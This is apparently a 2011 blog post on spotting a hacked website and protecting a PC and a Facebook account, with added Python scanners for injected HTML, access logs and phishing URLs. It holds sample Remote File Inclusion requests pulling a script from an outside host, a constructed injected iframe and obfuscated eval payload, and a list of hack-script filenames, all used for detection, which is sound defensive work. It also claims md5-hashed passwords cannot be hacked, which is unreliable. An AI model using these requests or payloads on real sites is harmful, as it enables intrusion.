Tuesday, March 15, 2011

How to know if your website has been hacked

1) Google says "This site may harm your computer"
If Google or Yahoo search engine result pages (SERPs) display a warning about your site, the most common cause is that your site was hacked. Please see the separate article about how to investigate and remove the Google / StopBadware warning message.
2) Visitors report getting viruses from your web pages
If visitors report to you that they get viruses or antivirus alerts from browsing your pages, it usually means your site has been hacked. Google and Yahoo will soon start displaying malware warnings about your site, so see the article about it, above.
It is, however, possible for your pages to deliver viruses even if your site hasn't been hacked. This can occur when your pages pull some of their content from third parties such as advertisers, and they got hacked or someone slipped a malicious advertisement into their lineup. That scenario is also discussed in the article above.
3) Visitors report being redirected to other websites
If you or other people try to visit your website but get automatically taken to some other website instead, it's another symptom of being hacked. It's a similar situation to the two described above and will eventually earn a Google or Yahoo! "badware flag". See the article referenced above.
4) Your traffic decreases dramatically and suddenly
Most web surfers stay away from sites that have the warning "This site may harm your computer". Those who continue to the site and get a virus or antivirus alert will leave immediately and not browse around. Either way, you'll see a drop in traffic. Anytime your traffic drops suddenly, investigate.
5) Your files contain code you didn't put there
If your pages suddenly contain links, text, or other objects you didn't put there, it's an indication you've been hacked. The source code of your pages (the text in your .htm, .html, or .php files, for example) should always stay the same as it was when you created it. If it changes, it's an indication someone figured out how to break into your site and change it. That should never happen.
One exception is that free webhosts sometimes require that you allow them to put ads into your pages. Occasionally someone thinks they've been hacked when it's really just the webhost's advertising code. If in doubt and you use free hosting, read the Terms of Service of your hosting plan.
6) Your site contains files you didn't put there
This is just like #5 above, except there are entire new files. It can be harder to make a judgment about new files because a site usually does contain files you didn't put there, many of them necessary for proper functioning (although most are in folders whose names are an indication of what they're for). You can examine text files to see if their contents look suspicious. Don't delete files just because you don't recognize them. Once you're afraid you might have been hacked, everything can look suspicious, even things that were always there that you just never noticed before.
7) Your search engine result page (SERP) listings suddenly change
When your site appears in search result listings, the pages listed should be pages that you know really exist, and the text shown should be related to what your site is about. If the listings suddenly show weird-named pages or text about topics unrelated to your site's content, it's another symptom of being hacked.
Places where you can monitor your site status
An important aspect of monitoring your site is to notice unusual changes, things that are different from normal, so make a habit of paying attention now to what is normal and usual, while your site is not hacked.
1) Each time you log into cPanel
Make a habit of checking the "Last login from:" box to make sure it shows your IP address from the last time you logged in.
2) Google Webmaster Central > Webmaster Tools
Google account (free) and login required. Google notifies you in Webmaster Tools if your site gets flagged as harmful. They often notify you by email, too, if they have your email address. You can also check your Google status anytime by typing this in a Google search box and viewing the results: site:yourdomain.com.
Google Webmaster Tools has other useful features. You can review the words and phrases of web searches for which your pages are being listed (make sure the phrases are relevant to your site's content), review errors that Googlebot has encountered on your site, and more.
3) Google Safe Browsing Diagnostic database
Warning messages in Google search results are based on a Google database. You can view an up-to-date report from the database for any website by entering this URL in your browser address bar. Replace EXAMPLE.COM with the address of the website you want to check:
http://www.google.com/safebrowsing/diagnostic?site=EXAMPLE.COM
I wrote a few paragraphs about how to interpret the diagnostic report here.
4) StopBadware.org Clearinghouse database
If your site is flagged, you'll find a short summary of badware behavior found.
5) Norton Safe Web, from Symantec
Reports the threats, categorized by type, that have been found on websites. You can go directly to the report for any site with this address (replace EXAMPLE.COM):
http://safeweb.norton.com/report/show?url=EXAMPLE.COM
6) McAfee SiteAdvisor safety and outlink reports
The report describes how many emails they received after registering at a site, how spammy the emails were, whether the site has outlinks to bad websites, and whether they found viruses or spyware on pages or in downloads. Users sometimes post public comments with complaints or praise. SiteAdvisor is a way to learn what others think of your site. It doesn't seem to be updated very often, however, so it's not an early warning system.
7) W3C HTML Validator
If your pages usually validate ok, but suddenly stop validating, it can be a sign that new code was inserted at invalid locations in your files. The reported validation errors might be at exactly the locations where the injected code is.
8) Search engine result pages (SERPs)
At each of the popular search engines, watch for:
• Pages that the search engine says are on your site, but that you didn't put there.
• Text snippets that are wrong, containing text not related to your site's subject.
9) When you browse your own site
Always use an up-to-date antivirus and antispyware program on your own PC so you'll be alerted if your website starts delivering malware. Use "real-time" (also known as "on access") protection that catches malicious files as soon as they are received. An on-demand scanner (such as a free online scanner, or a once-a-day manual scan) isn't enough. By the time you identify and quarantine the virus, the damage it was intended to cause might already be done.
Use your browser's View Source feature occasionally to inspect your page's HTML code for text injections of invisible iframes, JavaScript, and links to malicious websites. These are often the definitive indicators that the pages have been tampered with. The "badware investigation" article referenced above shows examples of what these things look like. They're just text. Once you know what to look for, they're easy to recognize.
It's a good idea also to check a few files on your server from time to time. Open your home page in your control panel's File Manager and inspect the HTML for the signs of tampering described above.
Whenever you are viewing a list of the files on your server (such as in cPanel > File Manager or by FTP), be alert for file names you don't recognize or sizes that are obviously wrong (such as a size of 0 for a file you know should be bigger).
The files on your server should never be different from what they were when you originally uploaded them. A file getting modified on your server without your permission is not normal. If it happens at all, it is an indication that something is wrong.
10) You can search your site files for suspicious code
This customizable PHP script can help search your website files for suspicious code or other suspicious text.
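An added example (not the author's PHP script) of the source inspection described above: a small Python scanner that walks a page's HTML and reports invisible iframes, obfuscated inline JavaScript and hidden links, the injection patterns the text says to look for. The domain name passed in and the two sample pages are constructed for the demo.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Heuristic markers of obfuscated, injected JavaScript.
OBFUSCATION = re.compile(r"eval\s*\(|unescape\s*\(|fromCharCode", re.IGNORECASE)

def _hidden(attrs):
    """True if a tag is sized to 0/1 px or hidden by inline CSS."""
    a = dict(attrs)
    style = (a.get("style") or "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    return any((a.get(k) or "").strip().rstrip("px") in ("0", "1")
               for k in ("width", "height"))

class InjectionScanner(HTMLParser):
    """Collects (kind, detail) findings while parsing one page."""

    def __init__(self, own_domain):
        super().__init__()
        self.own_domain = own_domain.lower()
        self.findings = []
        self._in_script = False

    def _foreign(self, url):
        """True if an absolute URL points outside our own domain."""
        host = (urlparse(url).hostname or "").lower()
        return bool(host) and host != self.own_domain \
            and not host.endswith("." + self.own_domain)

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        src = a.get("src") or ""
        if tag == "iframe":
            if _hidden(attrs):
                self.findings.append(("hidden_iframe", src))
            elif self._foreign(src):
                self.findings.append(("foreign_iframe", src))
        elif tag == "script":
            self._in_script = True
            if self._foreign(src):
                self.findings.append(("foreign_script", src))
        elif tag == "a" and _hidden(attrs):
            self.findings.append(("hidden_link", a.get("href") or ""))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # Inline script bodies arrive here; flag the usual obfuscation calls.
        if self._in_script and OBFUSCATION.search(data):
            self.findings.append(("obfuscated_script", data.strip()[:60]))

def scan_html(html, own_domain):
    """Return the (kind, detail) findings for one page's source."""
    scanner = InjectionScanner(own_domain)
    scanner.feed(html)
    scanner.close()
    return scanner.findings

# Constructed sample pages: a clean one and the same page with typical injections.
CLEAN = ('<html><body><h1>Welcome</h1><a href="/about.html">About</a>'
         '<script src="/js/menu.js"></script></body></html>')
TAMPERED = CLEAN.replace("</body>",
    '<iframe src="http://bad.example/x.php" width="0" height="0"></iframe>'
    '<script>eval(unescape("%64%6f%63"));</script>'
    '<a href="http://pills.example/" style="display:none">cheap</a></body>')
```

Run it over the saved source of your own pages; a non-empty result is a prompt to look at that spot in the file, not proof of compromise, since legitimate embeds from other domains are also reported.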
11) HTTP access log
This log records the requests for pages and other files from your site. When someone attacks your site (whether successfully or not), the attack is often recorded in your website access logs.
If you want to discover whether your site is being attacked, my hack attempt identifier online calculator can help with that. You paste lines from your HTTP log to find out which ones are hack attempts. Remember that just because an attack occurred doesn't mean it was successful, but it's still useful to know what you're up against.
Besides the information provided by the calculator, there are other indicators of a site compromise. If there are successful requests (HTTP result code 200) in your log for files you didn't put on the site, it's suspicious. It's even more suspicious if the filenames are variations of these often-used names for hack scripts: id.txt, cmd.txt, safe.txt, r57.txt, test.txt, echo.txt, php.txt, load.txt, or mic.txt.
Don't panic just because you find mentions of those filenames. You probably will find them. It matters where the names appear. Here are two different types of requests:
1. This one is a "Remote File Inclusion" (RFI) attack on your site. The GET command is requesting your index.php. It is trying to use the "query string" (the part after the first question mark) to inject safe.txt from the other site into your site. This is cause for concern because if it succeeds, your site will be hacked. However, this log line does not mean it has succeeded. It is just an attempt, and it is normal to find many of these attempts in your logs:
GET /blog/index.php?article=http://famousuniversity.com/user/safe.txt?
2. If the attack on your site does succeed (which you cannot determine from your log data alone), here is what famousuniversity will see in their log. This is a sign, to them, that they have been hacked. This GET is requesting safe.txt. If the result code is 200 (Success), it means the file was served, so it must be on the server. If they know that a file called safe.txt shouldn't be there, it means they were hacked and it was put there by somebody else, so they should find and examine the file. It is usually a PHP script intended to be used in attacks on other sites. I use famousuniversity as an example because my site actually has been attacked with scripts hosted at famous universities whose user accounts were compromised. It happens.
GET /user/safe.txt
As demonstrated in example 1, your access log is the place to learn how your site is being attacked, whether successfully or not, so you can learn what things you need to defend against.
Near-misses are good to learn from. If you find an attack that did not succeed in doing harm but did return a result code of 200 (meaning the server accepted the request and sent a file), it is a good idea to determine the malicious feature of the attack code and revise your .htaccess to block those types of requests. The goal should be for every known type of attack to get a 403 Forbidden result instead of 200. That will mean that your server rejected the request "at the front door", and the attack never had the opportunity to do harm. The Website Security article linked at the top of this page has some specific methods for this type of request blocking.
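An added example, not the author's online calculator, that applies the log-reading rules above to a few constructed access log lines: it flags RFI attempts (a URL inside the query string), requests for the hack-script filenames listed earlier, and whether each such request was served (200) or rejected at the front door (403).

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Filenames the text lists as often used for hosted hack scripts.
HACK_SCRIPT_NAMES = {"id.txt", "cmd.txt", "safe.txt", "r57.txt", "test.txt",
                     "echo.txt", "php.txt", "load.txt", "mic.txt"}

# Apache/cPanel "combined" format: ip ident user [time] "method target proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)'
    r'(?: [^"]*)?" (?P<status>\d{3}) (?P<size>\S+)')
REMOTE_URL = re.compile(r"^(https?|ftp)://", re.IGNORECASE)

def classify(line):
    """Parse one log line; return a dict with a 'tags' list, or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = m.group("target")
    parts = urlsplit(target)
    status = int(m.group("status"))
    tags = []
    # RFI attempt (example 1 in the text): a query-string value that is itself a URL.
    for _, value in parse_qsl(parts.query, keep_blank_values=True):
        if REMOTE_URL.match(value):
            tags.append("rfi_attempt")
            break
    # Example 2 in the text: a request for a file named like a hosted hack script.
    if parts.path.rsplit("/", 1)[-1].lower() in HACK_SCRIPT_NAMES:
        tags.append("hack_script_name")
    # 200 means the server accepted and served something (a near miss at best);
    # 403 means the request was rejected at the front door.
    if tags:
        tags.append("served" if status == 200 else
                    "blocked" if status == 403 else "other")
    return {"ip": m.group("ip"), "target": target, "status": status, "tags": tags}

def triage(log_text):
    """Classify every line and keep only those with something to report."""
    rows = []
    for line in log_text.splitlines():
        row = classify(line)
        if row and row["tags"]:
            rows.append(row)
    return rows

# Constructed sample log lines (RFC 5737 test addresses), not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [15/Mar/2011:10:01:02 +0000] "GET /blog/index.php?article=http://famousuniversity.com/user/safe.txt? HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [15/Mar/2011:10:01:03 +0000] "GET /blog/index.php?article=http://famousuniversity.com/user/cmd.txt? HTTP/1.1" 403 210 "-" "Mozilla/5.0"
198.51.100.7 - - [15/Mar/2011:10:02:00 +0000] "GET /user/safe.txt HTTP/1.0" 200 1403 "-" "libwww-perl/5.8"
192.0.2.9 - - [15/Mar/2011:10:03:11 +0000] "GET /blog/index.php?article=42 HTTP/1.1" 200 8800 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for row in triage(SAMPLE_LOG):
        print(row["status"], row["ip"], ",".join(row["tags"]), row["target"])
```

The first sample line is the attempt described in example 1 (served with 200, so worth a look at what index.php did with it); the third is what famousuniversity would see in example 2.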
Your HTTP and FTP access logs (see the next section) are usually available for download at cPanel > Raw Log Manager. The log files are usually stored outside public_html, sometimes in a folder called /logs, which you can find with cPanel > File Manager or with FTP.
12) FTP access log
Unauthorized users, IP addresses, or file transfers in your FTP log are proof that your site is compromised.

How to Prevent Hacking of your PC?

There are many ways in which a hacker may try to trick you into accepting a file, so that you take the bait and help him install a trojan or virus on your hard disk. If you want just one measure against being hacked, the best is to install an all-in-one solution that combines anti-virus, firewall and anti-spyware.

We personally use Norton Internet Security and we update our subscription every year. Another similar product which you may consider is ZoneAlarm, but we recommend Norton for their years and track record in the anti-virus arena. By the way, we don't get a commission for recommending it, so you can trust our advice. Not to forget that I am a trained hacker myself.

Nevertheless, you must know that whether or not your PC will be hacked will depend very much on your actions as well. For example, downloading files from warez sites and the poor habit of opening strange email attachments is as good as inviting hackers to break down your door. Some time ago I had the opportunity to try removing malignant spyware installed on a friend's machine. It took me 8 hours despite my experience, and eventually we had to reinstall the entire OS. Some of you might say that I should have reinstalled it after a short attempt; however, I preferred to take the challenge, but failed. :)

Prevention is always better than cure. If you would like to take the risk, a common practice (for some of us) is to use another PC when we need to do something risky. With constant PC upgrades, many of us could easily keep an older PC (at least one) just for this purpose. This reminds me of the hacking class that I attended a few years back: the instructor had to reinstall all the workstations almost every lesson to get rid of the remaining viruses or trojans from the previous lessons.

Another way of getting into trouble is to visit cracks, warez, and keygen websites. There are several ways in which your PC may be infected:

1) Clicking on buttons on the site which activate malicious scripts, including scareware windows.

2) Trojans, viruses or spyware hidden in software cracks or keygens.

3) Trojans, viruses, or spyware hidden in email attachments, and this includes pictures.

Although we mentioned earlier that you must have at least one piece of security software installed on your PC, it is impossible to guarantee that the software will protect you against any or all possible viruses, trojans and malicious programs.

If you find that your PC behaves abnormally, such as unexpected pop-up ads, applications shutting down, poor (or busy) internet connections, etc., there is a good chance that your PC is infected. You will then need to spend quite a bit of time performing a complete PC scan, trying to locate and remove the infected file, or reformatting and reinstalling the entire hard disk. Again, prevention is always better than cure, so back up your data at all times. Some viruses do more than simply shut down your PC: they can damage your hard disk physically by forcibly writing over a specific sector repeatedly within a very short time. We will not go into that.

We will summarize the 3 generic recommendations below.

* Install good internet security software (currently Norton 360 is recommended) and pay for the auto-update. This is important.
* Do not visit high-risk websites or click on any of the links there.

How to protect my facebook account from hacking?

This is exactly what you should do:

1. Install anti-virus to prevent trojans stealing information.
2. Change your password regularly
3. Make sure your friend doesn't have access to your computer physically
4. Do not open or download any executable file unless you know what you are doing
5. Have a strong password consisting of alphanumeric and special characters
6. Reconfirm your primary/secondary mail address
7. Do not give out your password to anybody at all
8. Keep a unique password for FB, different from your other online accounts
9. Relax

FB stores its passwords as non-decryptable hashes (using hashing algorithms like md5) and cannot be hacked. The only way it can be hacked is by your actions.

You must be using some pretty easy passwords, or you are writing them down and he is finding them. Use a password generator (google it) to generate a password with capital and lower case letters, numbers, and symbols and see if that stops him.

1. Never click suspicious links: It is possible that your friends could unwillingly send spam, viruses, or malware through Facebook if their accounts are infected. Do not click this material and do not run any ".exe" files on your computer without knowing what they are. Also, be sure to use the most current version of your browser as they contain important security warnings and protection features. Current versions of Firefox and Internet Explorer warn you if you have navigated to a suspected phishing site, and we recommend that you upgrade your browser to the most current version. You can also find more information about phishing and how to avoid it at http://www.antiphishing.org/consumer_recs.html and http://onguardonline.gov/phishing.html.

Phishing is an online attempt to trick a user by pretending to be an official login page or an official email from an organization that you would have an account with, such as a bank or an email provider, in order to obtain a user’s login and account information. In the case of a phishing login page, the login page may look identical to the login page you would normally go to, but the website does not belong to the organization you have an account with (the URL web address of the website should reflect this). In the case of a phishing email, the email may look like an email you would get from the organization you have an account with and get emails from, but the link in the email that it directs you to takes you to the above phishing login page, rather than a legitimate login page for that organization.

To prevent your account information from being obtained in a phishing scheme, only log in to legitimate pages of the websites you have an account with. For example, "www.facebook.example.com" is not a legitimate Facebook page on the "www.facebook.com" domain, but "www.facebook.com/example" is a legitimate Facebook page because it has the "facebook.com" domain. When in doubt, you can always just type in "facebook.com" into your browser to return to the legitimate Facebook site.

2. Have a unique, strong password: From the Account Settings page, be sure to use a different password than you use for other sites or services, made up of a complex string of numbers, letters, and punctuation marks that is at least six characters in length. Do not use words found in the dictionary.

3. Run anti-virus software: If your computer has been infected with a virus or with malware, you will need to run anti-virus software to remove harmful programs and keep your information secure.
* For Windows:
http://www.microsoft.com/protect/viruses/xp/av.mspx
http://www.microsoft.com/protect/computer/viruses/default.mspx
* For Apple/Mac OS:
http://support.apple.com/kb/HT1222
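An added example, not part of the answer above, that turns its domain rule into a check you can run on a link before clicking it: only the registered domain in the URL's host decides, never text in the path or in an earlier part of the hostname. The URLs below are constructed; the first three are the ones the answer discusses.

```python
from urllib.parse import urlsplit

def is_legitimate(url, domain="facebook.com"):
    """True only if the URL's host is `domain` itself or a subdomain of it."""
    # Bare hostnames like "facebook.com" get a scheme so urlsplit sees a host.
    parts = urlsplit(url if "://" in url else "https://" + url)
    # .hostname drops userinfo (user:pass@) and the port, and lowercases.
    host = parts.hostname or ""
    domain = domain.lower()
    return host == domain or host.endswith("." + domain)

# Constructed cases with the expected verdict for each.
CASES = {
    "www.facebook.example.com": False,   # the real domain here is example.com
    "www.facebook.com/example": True,    # text in the path does not matter
    "facebook.com": True,
    "http://www.facebook.com.login-check.example/": False,  # the last labels decide
    "http://www.facebook.com@203.0.113.9/login": False,     # host is after the "@"
    "https://m.facebook.com/login.php": True,
    "https://notfacebook.com/": False,   # suffix match needs the dot boundary
}

def check_all(cases=CASES):
    """Return the URLs whose verdict disagrees with the expectation (should be empty)."""
    return [u for u, expected in cases.items() if is_legitimate(u) != expected]

if __name__ == "__main__":
    for url in CASES:
        print(f"{str(is_legitimate(url)):5}  {url}")
```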